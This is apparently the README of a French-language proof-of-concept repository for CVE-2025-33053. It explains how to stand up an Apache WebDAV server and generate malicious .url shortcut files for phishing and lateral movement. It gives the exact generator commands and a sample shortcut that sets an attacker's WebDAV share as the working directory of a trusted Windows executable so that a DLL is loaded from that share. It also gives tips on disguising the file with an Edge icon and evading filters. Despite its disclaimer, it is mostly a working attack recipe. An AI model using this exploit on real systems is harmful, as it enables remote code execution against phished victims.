CVE-2025-33053 Preuve de concept (PoC)
Ce dépôt fournit des scripts pour déployer automatiquement un serveur WebDAV sur Ubuntu avec Apache2, et générer des fichiers de raccourci .url malveillants destinés au phishing, au red teaming ou à la simulation de mouvement latéral.
setup_webdav.sh – Script Bash pour configurer Apache2 + WebDAV.setup_webdav.py – Version Python du script précédent.gen_url.py – Script Python pour générer des fichiers de raccourci .url avec des chemins UNC/WebDAV.README.md – Documentation.sudosudo bash setup_webdav.sh
Ou avec Python :
sudo python3 setup_webdav.py
Par défaut, le script va :
/var/www/webdav.DAV et DAV_FS.DavLockDB (pour éviter les erreurs de verrouillage DAV d'Apache).📎 Chemin WebDAV :
http://<votre-ip>/webdav/
.url malveillantpython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
Cela créera un fichier .url comme celui-ci :
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Cliquer sur ce fichier (dans certaines configurations) peut amener le système cible à se connecter automatiquement à votre serveur WebDAV (authentification ou livraison de DLL).
sudo ufw allow 80
.url peuvent ne pas s'exécuter comme prévu selon :
.url en .txt pour contourner les filtres.Ce dépôt est destiné uniquement à des tests de pénétration éducatifs et autorisés.
N'utilisez pas ces scripts contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation de tester.
Pour toute question ou demande de red teaming éthique, contactez-nous via les issues GitHub.